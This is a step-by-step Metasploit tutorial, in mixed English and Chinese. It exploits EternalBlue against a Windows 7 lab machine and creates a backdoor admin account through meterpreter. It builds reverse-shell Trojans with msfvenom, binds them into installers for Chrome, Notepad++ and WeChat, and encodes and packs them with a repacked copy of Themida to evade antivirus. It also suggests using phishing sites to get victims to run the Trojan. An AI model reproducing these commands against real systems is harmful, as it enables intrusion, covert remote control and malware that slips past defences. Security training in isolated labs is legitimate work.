[P3] The most powerful penetration tool - metasploit (detailed installation, configuration and usage tutorial)

---

What is metasploit included? , metasploit attack windows operating system, metasploit attack Eternal Blue full process, use Kali penetration tool to generate remote control Trojan, metasploit attack example, msfvenom bypass anti-virus software technique bundled Trojan, msfvenom bypass anti-virus software technique packer, windows Install Themida, Themida usage tutorial.

---

1. What is metasploit?

Kali's most powerful penetration tool - metasploit

• msf is an open source security vulnerability exploitation and testing tool that integrates common overflow vulnerabilities and popular shellcodes on various platforms and is continuously updated.

• Metasploit makes the complex vulnerability attack process very simple. After a few hours of study, a computer novice can launch harmful attacks on mainstream vulnerabilities such as operating systems.

2. metasploit attacks Windows operating system

1. msfconsole: Start the metasploit command line [the command line is highly efficient and easy to use]

2. What you need to do before starting metasploit:

• Open kali terminal

• Use the sudo su command and enter kali's password kali to switch to the root user

• Use the msfdb init command to initialize the metasploit database (*optional)

3. Operation steps:

(1), sudo su switch to the super administrator root user, password kali (users without root need to create one by themselves)

• sudo su

(2) msfconsole starts metasploit command line interface

• msfconsole

3. The whole process of metasploit attacking Eternal Blue

永恒之蓝是指2017年4月14日晚，黑客团体Shadow Brokers（影子经纪人）公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日，不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招，被勒索支付高额赎金才能解密恢复文件

1. Use module: use exploit/windows/smb/ms17_010_eternalblue

2. Set required options: View required options [*required is yes] show options

3. Operation steps

(1) You can use the number to search for modules. The Eternal Blue number is defined by Microsoft as ms17_010

• search ms17_010

• exploit: vulnerability attack script

As shown in the figure, you can use Description to see what the module does.

(2), use modules

Two methods:

• use module name

• use module number

(3) In the configuration (settings) module, you can check the settings first and tell msf who to attack and what to do.

• show options

• Required: You only need to configure the required option to yes.

• RHOSTS: address

• RPORT: port, default 445

• VERIFY_ARCH, VERIFY_TARGET: These two options are already configured, just keep the default

• Payload options: Attack payload, default windows/x64/meterpreter/reverse_tcp: Obtain command execution permissions of the target machine; after the attack, what do you want to do?

• EXITFUNC: Already configured by default

• LHOST: listening address, IP address of the attacking machine

• LPORT: listening port

(4) Start the drone, win 7

• Target drone installation reference: https://blog.csdn.net/qq_45138120/article/details/131350059

• The target machine is a Windows virtual machine under VMware. The Windows version does not matter.

(5) Open cmd and use ipconfig to view the IP address of the target machine

• ipconfig

(6), kali sets the attack target address

• set RHOSTS target machine ip

(7) After the settings are completed, you can use show options again to check whether the configuration is complete.

• show options

As shown in the figure: Check whether the Current Setting whose Required configuration item is yes is empty. If it is not empty, the configuration is complete.

(8), you can modify the default LHOST port

• set lport 22222

注：端口范围 0-65535

---

Extension: Check if the port is open

① Check whether port 445 is open

• netstat -an

② The firewall must be turned off when attacking the drone here.

---

(9), run module

• run

As shown in the figure, the target machine will be automatically attacked and the named execution permission will be obtained. After the attack is successful, first print WIN and enter meterpreter

meterpreter：拿到了 Win 7 靶机的权限

(10). You can use help to view the commands that can be used.

• Command: command

• Description: Description or explanation of the command

• shutdown: shut down

• User interface Commands: User interface commands

• getdesktop: screenshot

• keyscna: Send keyboard commands

• mouse: Send mouse commands

(11), exit

• exit

4. What can metasploit do after a successful attack?

1. What can you do after a successful attack?

• Meterpreter is a powerful post-penetration module. You can enter help to view the help information.

• Remote control, command execution, camera monitoring, password acquisition, creating backdoor users, destroying and tampering with the system... These seemingly very complex and advanced operations can be completed with one line or a few letters and simple commands in meterpreter.

• Example: Create a backdoor user and enable remote connection

  • shell

  • net user zhangsan 123456 /add && net localgroup administrators zhangsan /add

  • exit

  • run getgui -e

2. Use the Kali penetration tool to generate remote control Trojans

(1) msfvenom is a software used to generate backdoors. It executes the backdoors on the target machine and monitors them locally.

• venom: poison, venom

• [* msfvenom is used in the shell, not the msfconsole terminal]

(2) Windows executable program backdoor:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 Iport=9999 -f exe -o demo.exe

• msfvenom: Tool used for execution

• -p：payload

• windows/x64/meterpreter/reverse_tcp: payload_name system/architecture/function/method; if you want to attack Linux, just replace windows with Linux (android, mac)

• lhost=192.168.123.136 Iport=9999: payload settings (kali address, kali port)

• -f：format

• exe: exe, windows executable file (ipk, jar, war)

• -o: output, input file name, such as demo.exe

4.1. Operation steps

(1), Generate Trojan file

• msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 Iport=9999 -f exe -o demo.exe

(2) As shown in the figure, the file is generated in the current path

• You can use ls to view

• You can use pwd to view the absolute path of the working directory

(3) You can use phishing websites to trick victims into clicking

(4) Download the Trojan to the local computer, demo.exe

When pulling to local, be sure to turn off anti-virus software

When the Trojan virus is downloaded locally, it will be intercepted by the anti-virus software. You will need to let the Trojan bypass the anti-virus software later.

Trojan viruses cannot be run directly. Just like fishing, the Trojan horse needs to be placed on the fishhook.

(5). Enter msfconsole from the terminal console.

• msfconsole

(6), use exploit/multi/handler module

• use exploit/multi/handler

(7), View settings

• show options

• Can be abbreviated: options

• Payload options: attack load settings (set to the playload_name set when generating the executable program backdoor)

(8) Set the attack load settings (set to the playload_name set when generating the executable program backdoor)

• set payload windows/x64/meterpreter/reverse_tcp

(9), set kali address

• set lhost 192.168.159.128

(10). Set the port (set to the Iport set when generating the executable program backdoor, which must be consistent)

• set lport 9999

(11). You can use options to view the setting information again.

(12), run

• run

Now that the fishhook has been thrown into the river, there are two ways to wait for the fish to take the bait: 1. Press the fish on the hook and exploit the loophole; 2. Jiang Taigong fishes, and those who wish will take the bait. Inducing fish to take the bait

(13) If the victim takes the bait, double-click the local deom.exe file

(14), as shown in the picture, the victim has taken the bait

• meterpreter: Obtain execution permissions of the victim's computer

(15) Enter help to view the command operations that can be executed

• help

4.2. Attack examples

(1), webcam_list, check whether the victim’s computer has a camera

• webcam_list

(2). I am using a desktop computer, so there is no camera.

5. Tips for bypassing anti-virus software with msfvenom

The most basic anti-virus software [ The effect of other anti-virus software is different, please try it yourself for specific circumstances] *

5.1. Bundling Trojans

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x notepad++.exe -o notepad++.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x chrome.exe -o chrome.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x firefox.exe -o firefox.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -o firefox.exe

- -x：模板（要使用哪一个正常程序的模板作为后门的生成）
注：如果 notepad++ 过不了，可以换其它软件；路径下必须存在可执行程序
- -e /指定编码方式对攻击载荷进行重新编码
- -x /指定木马捆绑在哪个可执行程序模板上
- -i /指定对目标进行编码的次数，多次编码理论上有助于免杀的实现
- -f /指定 msf 编码器输出程序的格式
- -o /指定处理完毕后的文件输出路径

注：使用捆绑木马时，路径下必须存在可执行程序

(1) In the path where the Trojan is generated, first copy an executable program, such as: chrome.exe

(2) Use msfvenom to generate a Trojan in the Windows environment, and bundle it into chrome.exe to generate a synthetic horse of chrome01.exe

• msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x chrome.exe -o chrome01.exe

Other examples:

• msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe

x86/shikata_ga_nai 进行多次编码的方式进行免杀处理

(3). Under this path, you can see that a Trojan horse chrome01.exe is generated.

5.2. Packing: compression shell, encryption shell

5.2.1. Themida: Packing software

5.2.1.1. Install Themida under Linux

• Themida Linux rar package Baidu network disk download link: https://pan.baidu.com/s/1v6q8y0Xg-SXMUXX4roEyJg?pwd=8fr8

• Extraction code: 8fr8

注：此压缩包 rar包，必须在 Linux 系统下进行解压，使用需要在 windows 下使用

---

Extension: Unzip rar package

(1) Reference for installation rar package tutorial: https://blog.csdn.net/weixin_40293999/article/details/122733513

(2) Unzip the rar package

---

5.2.1.2. Install Themida under windows

• Themida folder Baidu network disk download link under windows: https://pan.baidu.com/s/1vGaNf92vzUZbsMlzMwXNFA?pwd=sfcx

• Extraction code: sfcx

• After downloading, you will get a folder named Themida_x32_x64_v3.0.4.0_Repacked

5.2.1.2, Themida usage tutorial

注：Themida.exe为32位；Themida64.exe为64位

(1) Open the downloaded Themida_x32_x64_v3.0.4.0_Repacked folder and double-click the Themida64.exe execution file

(2) Pull the unpacked Trojan executable program into Themida software

• You can also select the imported Trojan file path in Themida software

(3) Click Protext to pack

注：加壳前，先将杀毒软件关闭，等加壳完成后再打开

Packing protection is automatically performed. After success, a file with the Protext name added will be generated locally.

(4) As shown in the picture, the shelling is completed, click Close.